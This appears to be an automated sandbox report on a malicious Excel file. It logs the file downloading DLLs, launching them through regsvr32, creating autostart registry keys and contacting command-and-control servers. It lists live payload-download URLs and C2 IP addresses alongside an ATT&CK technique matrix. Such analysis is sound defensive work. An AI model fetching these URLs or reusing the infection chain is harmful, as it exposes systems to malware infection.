              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\regsvr32.exe TID: 6700Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\regsvr32.exe TID: 6880Thread sleep time: -60000s >= -30000s
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dllJump to dropped file
              Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.8 %
              Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
              Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
              Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2415264641.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012793437.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066471204.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415830972.0000000000A34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066669199.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416016572.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B0691F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.63.99.23 7080
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.255.211.88 443
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443
              Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\regsvr32.exeCode function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,
              Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,
              Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,
              Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
              Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,
              Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
              Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
              Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,
              Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoW,
              Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B068C48 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
              Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFD2B0675D0 HeapCreate,GetVersion,HeapSetInformation,

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API
              21
              Registry Run Keys / Startup Folder
              11
              Process Injection
              141
              Masquerading
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium11
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts43
              Exploitation for Client Execution
              1
              DLL Side-Loading
              21
              Registry Run Keys / Startup Folder
              1
              Virtualization/Sandbox Evasion
              LSASS Memory11
              Security Software Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
              Non-Standard Port
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)1
              DLL Side-Loading
              11
              Process Injection
              Security Account Manager1
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
              Ingress Tool Transfer
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Hidden Files and Directories
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer4
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingData Transfer Size Limits125
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Regsvr32
              Cached Domain Credentials26
              System Information Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 745091 Sample: PO0000001552.xls Startdate: 13/11/2022 Architecture: WINDOWS Score: 100 39 129.232.188.93 xneeloZA South Africa 2->39 41 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->41 43 49 other IPs or domains 2->43 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 8 other signatures 2->63 8 EXCEL.EXE 163 55 2->8         started        signatures3 process4 dnsIp5 51 copunupo.ac.zm 41.63.0.22, 443, 49701 ZAMRENZM Zambia 8->51 53 datie-tw.com 175.98.167.165, 443, 49697 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Taiwan; Republic of China (ROC) 8->53 55 3 other IPs or domains 8->55 27 C:\Users\user\elv3.ooocccxxx, PE32+ 8->27 dropped 29 C:\Users\user\elv2.ooocccxxx, PE32+ 8->29 dropped 31 C:\Users\user\...vvmhfKiKFhKrSuHfBq[1].dll, PE32+ 8->31 dropped 33 o0oHPECmC0WPIXcvQP...OO7w00z7mkDO[1].dll, PE32+ 8->33 dropped 71 Document exploit detected (creates forbidden files) 8->71 73 Document exploit detected (UrlDownloadToFile) 8->73 13 regsvr32.exe 2 8->13         started        17 regsvr32.exe 2 8->17         started        19 regsvr32.exe 8->19         started        file6 signatures7 process8 file9 35 C:\Windows\System32\...\JZazaZgAOY.dll (copy), PE32+ 13->35 dropped 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->75 21 regsvr32.exe 1 13->21         started        37 C:\Windows\...\FrugrCuQjdEr.dll (copy), PE32+ 17->37 dropped 25 regsvr32.exe 1 17->25         started        signatures10 process11 dnsIp12 45 173.255.211.88, 443, 49705, 49707 LINODE-APLinodeLLCUS United States 21->45 47 182.162.143.56, 443, 49712, 49713 LGDACOMLGDACOMCorporationKR Korea Republic of 21->47 49 45.63.99.23, 7080 AS-CHOOPAUS United States 21->49 65 Creates multiple autostart registry keys 21->65 67 Creates an autostart registry key pointing to binary in C:\Windows 21->67 69 System process connects to network (likely due to code injection or exploit) 25->69 signatures13

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PO0000001552.xls66%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              8.2.regsvr32.exe.980000.0.unpack100%AviraHEUR/AGEN.1215461Download File
              SourceDetectionScannerLabelLink
              sbm.xinmoshiwang.com13%VirustotalBrowse
              datie-tw.com10%VirustotalBrowse
              copunupo.ac.zm18%VirustotalBrowse
              ly.yjlianyi.top13%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://roaming.edog.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://officeci.azurewebsites.net/api/0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://api.aadrm.com0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
              https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F100%Avira URL Cloudmalware
              https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/100%Avira URL Cloudmalware
              https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/0%Avira URL Cloudsafe
              http://ly.yjlianyi.top/wp-admin/4cChao/100%Avira URL Cloudmalware
              https://45.63.99.23:7080/tkafmhcgcid/0%Avira URL Cloudsafe
              http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/100%Avira URL Cloudmalware
              https://45.63.99.23:7080/b0%Avira URL Cloudsafe
              https://my.microsoftpersonalcontent.com0%Avira URL Cloudsafe
              https://api.scheduler.0%Avira URL Cloudsafe
              https://45.63.99.23:7080/tkafmhcgcid/8eM0%Avira URL Cloudsafe
              https://182.162.143.56/tkafmhcgcid/100%Avira URL Cloudmalware
              https://182.162.143.56/100%Avira URL Cloudmalware
              https://45.63.99.23:7080/20%Avira URL Cloudsafe
              https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              sbm.xinmoshiwang.com
              47.92.35.35
              truefalseunknown
              datie-tw.com
              175.98.167.165
              truefalseunknown
              copunupo.ac.zm
              41.63.0.22
              truefalseunknown
              ly.yjlianyi.top
              81.68.152.197
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://ly.yjlianyi.top/wp-admin/4cChao/false
              • Avira URL Cloud: malware
              unknown
              https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/true
              • Avira URL Cloud: malware
              unknown
              http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/true
              • Avira URL Cloud: malware
              unknown
              https://182.162.143.56/tkafmhcgcid/true
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://api.diagnosticssdf.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                high
                https://login.microsoftonline.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                  high
                  https://shell.suite.office.com:1443E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                    high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                      high
                      https://autodiscover-s.outlook.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                        high
                        https://roaming.edog.E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                          high
                          https://cdn.entity.E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://api.addins.omex.office.net/appinfo/queryE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                            high
                            https://clients.config.office.net/user/v1.0/tenantassociationkeyE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                              high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                high
                                https://powerlift.acompli.netE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://lookup.onenote.com/lookup/geolocation/v1E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                  high
                                  https://cortana.aiE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                    high
                                    https://api.powerbi.com/v1.0/myorg/importsE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                      high
                                      https://cloudfiles.onenote.com/upload.aspxE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                        high
                                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                          high
                                          https://entitlement.diagnosticssdf.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                            high
                                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                              high
                                              https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/Fregsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://api.aadrm.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ofcrecsvcapi-int.azurewebsites.net/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                high
                                                https://api.microsoftstream.com/api/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                  high
                                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                    high
                                                    https://cr.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                      high
                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      https://portal.office.com/account/?ref=ClientMeControlE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                        high
                                                        https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://graph.ppe.windows.netE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                          high
                                                          https://res.getmicrosoftkey.com/api/redemptioneventsE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://powerlift-frontdesk.acompli.netE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://tasks.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                            high
                                                            https://officeci.azurewebsites.net/api/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://45.63.99.23:7080/tkafmhcgcid/regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                              high
                                                              https://api.scheduler.E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://my.microsoftpersonalcontent.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://store.office.cn/addinstemplateE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.aadrm.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                high
                                                                https://globaldisco.crm.dynamics.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                  high
                                                                  https://messaging.engagement.office.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                    high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                      high
                                                                      https://dev0-api.acompli.net/autodetectE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.odwebp.svc.msE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://api.diagnosticssdf.office.com/v2/feedbackE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                        high
                                                                        https://api.powerbi.com/v1.0/myorg/groupsE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                          high
                                                                          https://web.microsoftstream.com/video/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                            high
                                                                            https://api.addins.store.officeppe.com/addinstemplateE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://45.63.99.23:7080/bregsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://graph.windows.netE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                              high
                                                                              https://dataservice.o365filtering.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officesetup.getmicrosoftkey.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://analysis.windows.net/powerbi/apiE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                high
                                                                                https://prod-global-autodetect.acompli.net/autodetectE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                  high
                                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                    high
                                                                                    https://consent.config.office.com/consentcheckin/v1.0/consentsE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                      high
                                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                        high
                                                                                        https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                          high
                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                            high
                                                                                            https://ncus.contentsync.E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                              high
                                                                                              https://45.63.99.23:7080/tkafmhcgcid/8eMregsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                high
                                                                                                http://weather.service.msn.com/data.aspxE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                  high
                                                                                                  https://apis.live.net/v5.0/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                    high
                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                      high
                                                                                                      https://messaging.lifecycle.office.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                        high
                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                          high
                                                                                                          https://management.azure.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                              high
                                                                                                              https://wus2.contentsync.E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://incidents.diagnostics.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                high
                                                                                                                https://clients.config.office.net/user/v1.0/iosE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                  high
                                                                                                                  https://182.162.143.56/regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://45.63.99.23:7080/2regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://insertmedia.bing.office.net/odc/insertmediaE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                    high
                                                                                                                    https://o365auditrealtimeingestion.manage.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                        high
